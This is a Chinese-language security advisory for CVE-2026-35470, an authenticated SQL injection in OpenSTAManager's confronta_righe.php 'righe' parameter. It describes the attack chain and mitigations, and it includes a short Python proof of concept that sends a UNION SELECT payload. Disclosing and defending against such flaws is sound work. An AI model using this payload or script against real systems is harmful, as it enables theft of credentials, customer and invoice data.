IPBUF安全漏洞报告
English
CVE-2026-35470 CVSS 8.8 高危

CVE-2026-35470 OpenSTAManager SQL注入漏洞

披露日期: 2026-04-06

漏洞信息

漏洞编号
CVE-2026-35470
漏洞类型
SQL注入
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenSTAManager

相关标签

SQL注入OpenSTAManagerCVE-2026-35470数据泄露

漏洞概述

OpenSTAManager在2.10.2之前的版本存在SQL注入漏洞。由于多个模块中的`confronta_righe.php`文件未对`$_GET['righe']`参数进行有效过滤,导致经过身份验证的攻击者可注入恶意SQL语句,进而窃取用户凭证、客户信息及发票数据等敏感信息。

技术细节

该漏洞源于OpenSTAManager不同模块中的`confronta_righe.php`文件在处理用户输入时存在安全缺陷。脚本直接从`$_GET`超全局变量中获取`righe`参数,并将其拼接到SQL查询语句中,完全未经过任何形式的输入过滤、参数化处理或验证。这种不安全的编码方式导致了SQL注入漏洞。由于系统要求低权限认证,攻击者一旦登录系统,即可构造恶意的SQL载荷并发送至服务器。成功利用后,攻击者不仅能绕过应用程序的正常逻辑,还能执行任意SQL命令,从而从数据库中提取高度敏感的数据,如管理员凭证、客户个人信息及财务记录。

攻击链分析

STEP 1
1. 信息收集
攻击者识别目标使用OpenSTAManager,并确认版本低于2.10.2。
STEP 2
2. 获取凭证
攻击者利用低权限账户登录系统(满足PR:L要求)。
STEP 3
3. 漏洞利用
攻击者向`confronta_righe.php`发送包含恶意SQL注入代码的GET请求,参数`righe`被构造为Union Select或布尔盲注语句。
STEP 4
4. 数据窃取
数据库执行恶意SQL语句,返回敏感数据(如用户凭证、发票信息)给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# Proof of Concept for CVE-2026-35470 # Demonstrates SQL Injection in OpenSTAManager < 2.10.2 import requests target_url = "http://target-ip/openstamanager/confronta_righe.php" # Authentication is required (PR:L) cookies = { "PHPSESSID": "valid_session_id_here" } # Vulnerable parameter: righe # Payload attempts to extract database version via UNION based SQL Injection payload = "1 UNION SELECT 1,2,version(),4,5-- -" params = { "righe": payload } try: response = requests.get(target_url, params=params, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check response content for SQL errors or leaked data.") print(response.text[:500]) except Exception as e: print(f"[-] Error: {e}")

影响范围

OpenSTAManager < 2.10.2

防御指南

临时缓解措施
建议立即升级至OpenSTAManager 2.10.2或更高版本以修复此漏洞。如果无法立即升级,应在Web应用防火墙(WAF)中部署规则以拦截针对`confronta_righe.php`文件的恶意SQL注入尝试,并严格限制对该文件的访问权限。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表